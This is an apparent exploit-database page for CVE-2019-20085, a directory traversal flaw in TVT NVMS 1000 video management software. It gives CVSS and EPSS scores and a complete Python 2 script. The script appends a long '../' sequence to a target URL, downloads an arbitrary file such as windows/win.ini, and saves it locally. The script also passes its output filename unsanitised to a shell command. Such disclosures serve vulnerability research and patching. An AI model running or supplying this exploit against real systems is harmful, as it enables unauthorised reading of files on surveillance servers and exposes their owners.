Mohin ParamasivamEDB-ID:48311TVT NVMS 1000 - Directory Traversal
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
97.9%
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan TΓΌrle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:
traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)
if content.status_code == 200:
print " "
print "Directory Traversal Succeeded"
time.sleep(3)
print " "
print "Saving Output"
os.system("touch " + outputname)
output_write = open(outputname,"r+")
output_write.write(content.text)
output_write.close()
else:
print "Host not vulnerable to Directory Traversal!"Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
97.9%